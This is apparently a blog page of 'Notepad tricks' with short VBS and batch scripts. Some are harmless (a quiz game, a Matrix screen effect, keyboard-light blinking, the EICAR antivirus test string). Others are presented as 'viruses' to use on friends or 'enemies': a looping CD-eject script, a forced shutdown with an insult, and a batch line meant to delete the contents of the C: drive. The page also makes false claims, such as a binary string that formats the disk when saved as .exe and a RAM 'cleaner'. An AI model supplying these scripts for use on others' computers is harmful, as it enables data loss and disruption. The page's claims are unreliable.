Skip to main content

Posts

Showing posts with the label Notapad tricks

How to speed up your computer RAM?

Speed up your computer by cleaning RAM using notepad. 1) open notepad and type freeMem=space(64000000) 64mb cleaned 2) save file with name "clean ram.vbs" 3) close it and run the save file. 4) enjoy. if you want to free more memory use following command. 1) for 256mb clean type freeMem=space(256000000) 2) for 128mb clean type freeMem=(128000000) i think now you can understand this 

How to create CD/DVD virus that popup CD/DVD drive?

1. Create CD Virus from Notepad (continuously pop out CD Drive) Open Notepad and Write down below codes:  Set oWMP = CreateObject(“WMPlayer.OCX.7″) Set colCDROMs = oWMP.cdromCollection do if colCDROMs.Count >= 1 then For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next For i = 0 to colCDROMs.Count – 1 colCDROMs.Item(i).Eject Next End If wscript.sleep 5000 loop Now save the note as “cdvirus.vbs”. Now, if you open this file in your system, your cd drive will pop-out continuously. You can try this trick on your friends computer and give him the fright of his life. The cdvirus.vbs can be closed only by rebooting your Windows PC.

How to create Virus that shutdown your friends PC?

Virus that Shutdown your Friend Computer with Message Open Notepad and Type:- @echo off Shutdown.exe -s -t 10 cls msg * I Don’t Like You SHIT head! Now save it as “shutdownvirus.bat”. Every time you open shutdownvirus.bat on your PC, your PC will shut down with a message stating ‘I Don’t Like You SHIT head.’ This trick is the best one to scare your friends.

How to create your own personal diary with date & time ?

4. Create Your Own Personal Diary With Time & Date With Notepad This Notepad trick will allow you to create Notepad note in such a format that whenever you edit your note, it will get saved with date and timestamp automatically. To do this, follow these steps: Open Notepad Type .LOG in the first line. Save the file as Log.txt Now, write something to the file and it will automatically get saved with edited date and time. Save the note as “personaldiary.txt”. When you open the file again you will see the current date and time being inserted automatically after the LOG line. This will happen automatically every time you reopen personaldiary.txt and you can keep a diary of sorts with it.

How to test any Anti-Virus software is effective or not?

5. Test Your Anti-Virus Software’s Effectiveness You can also use Notepad to test whether your antivirus is as good as the av company claims it to be. Copy the code give below in your Notepad file: X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* Save this note as “virus.exe” on your computer and reopen it. If the antivirus installed on your PC/laptop is good enough it will trigger and flag virus.exe. If it doesn’t flag the virus.exe automatically put your PC on a scan and check out whether your antivirus is able to flag it. If not, its time to buy another anti-virus product.

How to create Matrix Movie computer screen effects in computer?

6. Create Matrix Movie Computer Screen Effects in Your Computer Open Notepad and copy the below-mentioned text in your notepad file: @echo off color 02 :start echo %random% %random% %random% %random% %random% %random% %random% %random% %random% %random% goto start Now save the note as”matrix .bat ” in your PC/laptop. Reopen it and enjoy the Matrix-like effects that appear on your screen.

How to convert Text into Audio?

7. Convert Text Into Audio With This Notepad Trick Open Notepad and type Dim message, sapi message=InputBox(“Enter your text for conversion–Hacking-Techworm”,”Hover pc Hacks Text-To-Audio Converter”) Set sapi=CreateObject(“sapi.spvoice”) sapi.Speak message Now save this note as “textaudio.vbs” on your computer. Open textaudio.vbs and hear your PC/laptop speak.

How to create Virus to format whole Hard disk in your computer?

9. Format Your Whole Hard Disk With This Notepad Trick This is really interesting things for you guys, you can format any PC by executing below file. Open notepad and type the below code in it. 01100110011011110111001001101101011000010111010000 100000011000110011101001011100 0010000000101111010100010010111101011000 Now save it as “Format.exe” or give any name you desire but keep the extension as .exe. That’s It ! Now just double click on the file (to open it) and your C: drive will be formatted !

How to create a harmful Virus to format computer?

10. Write A Simple Undetectable Virus Like the above trick, this will also delete the contents of your C: Drive. Open Notepad and copy paste the below text. @Echo off Del C:\ *.* |y And save that as bomb.bat or any other name that you with .bat extension. When you double-click and open this file, it will start deleting the contents of your C: The above two tricks are best to be tried on your enemies.

How to create a Dancing Keyboard Led Disco lights?

Dancing Keyboard Led. Step 1. First of all Open Notepad. Step 2. copy below codes into it. Set wshShell =wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "{CAPSLOCK}" wshshell.sendkeys "{NUMLOCK}" wshshell.sendkeys "{SCROLLLOCK}" loop Step 3. Then save this file as dance.vbs  Note : (name can be anything but .vbs is must) Step 4. Now open your save file and see your keyboard led blinking like disco lights. thnkxx for watching my trick, if u want to see more tricks then like and share my website

How to create Quiz Game in Notepad

1. Open notepad 2. Paste this code @echo off color b0 :menu cls echo Hey! Welcome to the game! echo 1) start! echo 2) how to play echo 3) Exit :,( set /p number= if %number% == 1 goto StartGame if %number% == 2 goto help if %number% == 3 goto exit :startgame cls echo Type Your Name: set /p name= echo Hello %name%! echo Do you want to start the quiz? (y/n) set /p start= if %start% == y goto level1 if %start% == n goto menu goto startgame :help cls echo Press the number of the answer then hit enter. echo go back? (y/n) set /p menugoto= if %menugoto% == y goto menu if %menugoto% == n goto exit goto help :exit goto exit :level1 cls echo Okay, Let's Start. echo What is 10 + 10? echo 1) 1 echo 2) 20 echo 3) 500 set /p answer1= if %answer1% == 1 goto wrong1 if %answer1% == 2 goto correct1 if %answer1% == 3 goto wrong1 goto level1 :correct1 echo You are right! Next Level? (y/n) set /p NL1= if %NL1% == y goto level2 if %NL1% == n goto men